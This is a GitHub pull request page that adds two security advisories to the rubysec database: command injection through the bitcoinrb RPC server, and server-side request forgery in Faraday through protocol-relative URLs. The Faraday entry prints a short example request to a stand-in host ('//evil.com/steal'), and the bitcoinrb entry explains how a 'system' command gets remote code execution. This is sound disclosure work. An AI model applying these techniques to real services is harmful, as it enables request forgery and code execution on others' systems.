-
-
Notifications
You must be signed in to change notification settings - Fork 231
GHSA SYNC: 2 brand new advisories #991
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Merged
postmodern
merged 3 commits into
rubysec:master
from
jasnow:ghsa-syncbot-2026-02-11-07_14_10
Feb 11, 2026
Merged
Changes from 2 commits
Commits
Show all changes
3 commits
Select commit
Hold shift + click to select a range
File filter
Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,46 @@ | ||
| --- | ||
| gem: bitcoinrb | ||
| ghsa: q66h-m87m-j2q6 | ||
| url: https://github.com/chaintope/bitcoinrb/security/advisories/GHSA-q66h-m87m-j2q6 | ||
| title: Bitcoinrb Vulnerable to Command injection via RPC | ||
| date: 2026-02-10 | ||
| description: | | ||
| ### Summary: Remote Code Execution | ||
|
|
||
| Unsafe handling of request parameters in the RPC HTTP server | ||
| results in command injection. | ||
|
|
||
| ### Details | ||
|
|
||
| In lib/bitcoin/rpc/http_server.rb line 30-39, the JSON body of a | ||
| POST request is parsed into `command` and `args` variables. These | ||
| values are then passed to `send`, which is used to call an arbitrary | ||
| class method. However, there is no validation that the provided | ||
| `command` value is one of the expected RPC methods. | ||
| This means that an attacker could supply a `command` value such | ||
| as `system`, and then pass arbitrary system commands into the | ||
| `args` parameter and achieve remote code execution. | ||
|
|
||
| ### Remediation | ||
|
|
||
| **Mitigating Factors:** | ||
|
|
||
| - The RPC server is part of the experimental SPV node feature, | ||
| which is not documented and has very few users. | ||
| - The SPV-related features may be removed in future releases. | ||
|
|
||
| **Resolution:** | ||
|
|
||
| - Added whitelist validation to allow only RPC methods defined | ||
| in `RequestHandler`. | ||
|
|
||
| - Fixed in version 1.12.0. | ||
| patched_versions: | ||
| - ">= 1.12.0" | ||
| related: | ||
| url: | ||
| - https://github.com/chaintope/bitcoinrb/releases/tag/v1.12.0 | ||
| - https://github.com/chaintope/bitcoinrb/security/advisories/GHSA-q66h-m87m-j2q6 | ||
| - https://github.com/chaintope/bitcoinrb/commit/070327133a2a3e5a6d265b2d82f06f9414c01e74 | ||
|
|
||
| - https://github.com/advisories/GHSA-q66h-m87m-j2q6 | ||
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,75 @@ | ||
| --- | ||
| gem: faraday | ||
| cve: 2026-25765 | ||
| ghsa: 33mh-2634-fwr2 | ||
| url: https://github.com/lostisland/faraday/security/advisories/GHSA-33mh-2634-fwr2 | ||
| title: Faraday affected by SSRF via protocol-relative URL host | ||
| override in build_exclusive_url | ||
| date: 2026-02-09 | ||
| description: | | ||
| ### Impact | ||
|
|
||
| Faraday's `build_exclusive_url` method (in `lib/faraday/connection.rb`) | ||
| uses Ruby's `URI#merge` to combine the connection's base URL with | ||
| a user-supplied path. Per RFC 3986, protocol-relative URLs | ||
| (e.g. `//evil.com/path`) are treated as network-path references | ||
| that override the base URL's host/authority component. | ||
|
|
||
| This means that if any application passes user-controlled input to | ||
| Faraday's `get()`, `post()`, `build_url()`, or other request | ||
| methods, an attacker can supply a protocol-relative URL like | ||
| `//attacker.com/endpoint` to redirect the request to an | ||
| arbitrary host, enabling Server-Side Request Forgery (SSRF). | ||
|
|
||
| The `./` prefix guard added in v2.9.2 (PR #1569) explicitly exempts | ||
| URLs starting with `/`, so protocol-relative URLs bypass it entirely. | ||
|
|
||
| **Example** | ||
| ```ruby | ||
| conn = Faraday.new(url: 'https://api.internal.com') | ||
| conn.get('//evil.com/steal') | ||
| # Request is sent to https://evil.com/steal instead of api.internal.com | ||
| ``` | ||
|
|
||
| ### Patches | ||
|
|
||
| Faraday v2.14.1 is patched against this security issue. All | ||
| versions of Faraday up to 2.14.0 are affected. | ||
|
|
||
| ### Workarounds | ||
|
|
||
| **NOTE: Upgrading to Faraday v2.14.1+ is the recommended action | ||
| to mitigate this issue, however should that not be an option | ||
| please continue reading.** | ||
|
|
||
| Applications should validate and sanitize any user-controlled | ||
| input before passing it to Faraday request methods. | ||
| Specifically: | ||
|
|
||
| - Reject or strip input that starts with // followed by a | ||
| non-/ character. | ||
| - Use an allowlist of permitted path prefixes. | ||
| - Alternatively, prepend ./ to all user-supplied paths before | ||
| passing them to Faraday. | ||
|
|
||
| Example validation: | ||
| ```ruby | ||
| def safe_path(user_input) | ||
| raise ArgumentError, "Invalid path" if user_input.match?(r{\A//[^/]}) | ||
| user_input | ||
| end | ||
| ``` | ||
| cvss_v3: 5.8 | ||
| patched_versions: | ||
| - ">= 2.14.1" | ||
| related: | ||
| url: | ||
| - https://nvd.nist.gov/vuln/detail/CVE-2026-25765 | ||
| - https://github.com/lostisland/faraday/security/advisories/GHSA-33mh-2634-fwr2 | ||
| - https://github.com/lostisland/faraday/releases/tag/v2.14.1 | ||
| - https://github.com/lostisland/faraday/pull/1569 | ||
| - https://github.com/lostisland/faraday/commit/a6d3a3a0bf59c2ab307d0abd91bc126aef5561bc | ||
| - https://www.rfc-editor.org/rfc/rfc3986#section-5.2.2 | ||
| - https://www.rfc-editor.org/rfc/rfc3986#section-5.4 | ||
| - https://advisories.gitlab.com/pkg/gem/faraday/CVE-2026-25765 | ||
| - https://github.com/advisories/GHSA-33mh-2634-fwr2 |
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
Uh oh!
There was an error while loading. Please reload this page.